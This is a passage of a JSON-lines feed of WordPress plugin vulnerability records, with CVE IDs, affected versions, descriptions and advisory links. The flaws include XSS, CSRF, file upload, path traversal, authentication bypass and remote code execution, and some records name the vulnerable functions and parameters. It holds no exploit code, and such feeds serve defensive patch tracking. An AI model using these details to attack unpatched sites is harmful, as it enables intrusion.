files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52325f9-51b5-469c-865e-73a22002d46f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a52325f9-51b5-469c-865e-73a22002d46f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0526","slug":"post-shortcode","versionImpact":"2.0.9","description":"The Post Shortcode WordPress plugin through 2.0.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ec58310-243d-40c8-9fa6-8753947bfa89\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ec58310-243d-40c8-9fa6-8753947bfa89\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-46889","slug":"photo-gallery","versionImpact":"1.5.69","description":"The 10Web Photo Gallery plugin through 1.5.69 for WordPress allows XSS via theme_id for bwg_frontend_data. NOTE: other parameters are covered by CVE-2021-24291, CVE-2021-25041, and CVE-2021-31693.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/162227\\\/WordPress-Photo-Gallery-1.5.69-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/162227\\\/WordPress-Photo-Gallery-1.5.69-Cross-Site-Scripting.html\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2078","slug":"buymeacoffee","versionImpact":"3.7","description":"The \"Buy Me a Coffee \u2013 Button and Widget Plugin\" plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to update the plugins settings. CVE-2023-25030 may be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2935565%40buymeacoffee&new=2935565%40buymeacoffee&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/includes\\\/class-buy-me-a-coffee.php?rev=2319979#L162\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1c218c6-1599-4dc9-846f-e0ef74821488?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1c218c6-1599-4dc9-846f-e0ef74821488?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buymeacoffee\\\/trunk\\\/admin\\\/class-buy-me-a-coffee-admin.php?rev=2816542\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4887","slug":"intergeo-maps","versionImpact":"2.3.2","description":"The Google Maps Plugin by Intergeo for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'intergeo' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intergeo-maps\\\/tags\\\/2.3.2\\\/index.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intergeo-maps\\\/tags\\\/2.3.2\\\/index.php#L1146\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb6d11ad-0983-4a4b-b52b-824eae8b8e3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6826","slug":"e2pdf","versionImpact":"1.20.25","description":"The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'import_action' function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03faec37-2cce-4e14-92f2-d941ab1b4ce9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L753\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L753\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L1488\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/e2pdf\\\/trunk\\\/classes\\\/controller\\\/e2pdf-templates.php?rev=2993824#L1488\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009695\\\/e2pdf#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009695\\\/e2pdf#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1361","slug":"colibri-page-builder","versionImpact":"1.0.253","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the apiCall() function. This makes it possible for unauthenticated attackers to call a limited set of functions that can be used to import images, delete posts, or save theme data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/233a29f5-12bf-4849-9b28-4458a0b0c940?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/api\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039597\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/api\\\/api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1843","slug":"wp-auto-affiliate-links","versionImpact":"6.4.3","description":"The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3. This makes it possible for authenticated attackers, with subscriber access or higher, to add arbitrary links to posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09e5aa34-ab28-4349-ac5f-6a0479e641e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-affiliate-links\\\/trunk\\\/aal_ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-auto-affiliate-links\\\/trunk\\\/aal_ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044067%40wp-auto-affiliate-links&new=3044067%40wp-auto-affiliate-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3407","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262348ab-a335-4acf-8e4d-229fc0b4972f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262348ab-a335-4acf-8e4d-229fc0b4972f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49852","slug":"responsive-slick-slider","versionImpact":"1.4","description":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Vsourz Digital Responsive Slick Slider WordPress allows Code Injection.This issue affects Responsive Slick Slider WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-slick-slider\\\/wordpress-responsive-slick-slider-wordpress-plugin-1-4-content-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-slick-slider\\\/wordpress-responsive-slick-slider-wordpress-plugin-1-4-content-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10519","slug":"wish-list-for-woocommerce","versionImpact":"7.4","description":"The Wishlist for WooCommerce: Multi Wishlists Per Customer PRO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wtab' parameter in versions 3.0.8 to 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Note: Only WordPress installations with versions of PHP <=7.4 are affected by this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blame\\\/master\\\/templates\\\/wish-list.php#L214\",\"name\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blame\\\/master\\\/templates\\\/wish-list.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blob\\\/fafa2319a8907d3260a89a2a6b4fa9ea6602c7db\\\/templates\\\/wish-list.php#L94\",\"name\":\"https:\\\/\\\/github.com\\\/wpcodefactory\\\/wish-list-for-woocommerce\\\/blob\\\/fafa2319a8907d3260a89a2a6b4fa9ea6602c7db\\\/templates\\\/wish-list.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/trunk\\\/templates\\\/wish-list.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/trunk\\\/templates\\\/wish-list.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189775\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wish-list-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wish-list-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14896f-7f0e-4168-8a2d-309bbaddbedc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb14896f-7f0e-4168-8a2d-309bbaddbedc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12394","slug":"wp-action-network","versionImpact":"1.4.4","description":"The Action Network plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-action-network\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-action-network\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c90dadc9-0109-4ebd-8135-3efd26682ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c90dadc9-0109-4ebd-8135-3efd26682ad9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13791","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.2 via the downloadResponseFile() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-bit-assist\\\/blob\\\/main\\\/bit-assist\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-bit-assist\\\/blob\\\/main\\\/bit-assist\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17fd14e7-503a-49e4-9344-5f8d51801eb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17fd14e7-503a-49e4-9344-5f8d51801eb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4699","slug":"media-element-html5-video-and-audio-player","versionImpact":"4.2.8","description":"The MediaElement.js WordPress plugin through 4.2.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e57f38d9-889a-4f82-b20d-3676ccf9c6f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e57f38d9-889a-4f82-b20d-3676ccf9c6f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1336","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check on the ajax_deactivate function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to disable caching.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2296800-93d6-48fa-aa09-3d28fa6371d7\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2296800-93d6-48fa-aa09-3d28fa6371d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0522","slug":"auto-login-when-resister","versionImpact":"1.1.0","description":"The Enable\/Disable Auto Login when Register WordPress plugin through 1.1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7984bfb-86a3-4530-90ae-17ab39af1c54\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c7984bfb-86a3-4530-90ae-17ab39af1c54\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2986","slug":"woocommerce-abandoned-cart","versionImpact":"5.14.2","description":"The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, which users are typically customers.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php#L1815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php#L1815\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68052614-204f-4237-af0e-4b8210ebd59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68052614-204f-4237-af0e-4b8210ebd59f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922242\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php?rev=2916178#L1800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php?rev=2916178#L1800\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45823","slug":"video-contest","description":"Cross-Site Request Forgery (CSRF) vulnerability in GalleryPlugins Video Contest WordPress plugin <=\u00a03.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/video-contest\\\/wordpress-video-contest-wordpress-plugin-plugin-3-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/video-contest\\\/wordpress-video-contest-wordpress-plugin-plugin-3-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4840","slug":"mappress-google-maps-for-wordpress","versionImpact":"2.88.4","description":"The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'mappress' shortcode in versions up to, and including, 2.88.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.5\\\/mappress.php?rev=2965022#L919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.5\\\/mappress.php?rev=2965022#L919\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.4\\\/mappress_map.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mappress-google-maps-for-wordpress\\\/tags\\\/2.88.4\\\/mappress_map.php#L381\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d2c9a4-32f7-484f-86ce-a33ef1174b28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d2c9a4-32f7-484f-86ce-a33ef1174b28?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6553","slug":"backup-backup","versionImpact":"1.3.7","description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the \/includes\/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backup-backup\\\/tags\\\/1.3.7\\\/includes\\\/backup-heart.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.synacktiv.com\\\/en\\\/publications\\\/php-filters-chain-what-is-it-and-how-to-use-it\",\"name\":\"https:\\\/\\\/www.synacktiv.com\\\/en\\\/publications\\\/php-filters-chain-what-is-it-and-how-to-use-it\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3006541%40backup-backup&new=3006541%40backup-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1806","slug":"wp-user-avatar","versionImpact":"4.15.1","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b9d0ab-d785-4e93-9ab8-f75673a27334?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/tags\\\/4.15.0\\\/src\\\/ShortcodeParser\\\/EditProfileTag.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/tags\\\/4.15.0\\\/src\\\/ShortcodeParser\\\/EditProfileTag.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040292%40wp-user-avatar%2Ftrunk&old=3038677%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3406","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bfab060-64d2-4c38-8bc8-a8f81c5a6e0d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1bfab060-64d2-4c38-8bc8-a8f81c5a6e0d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
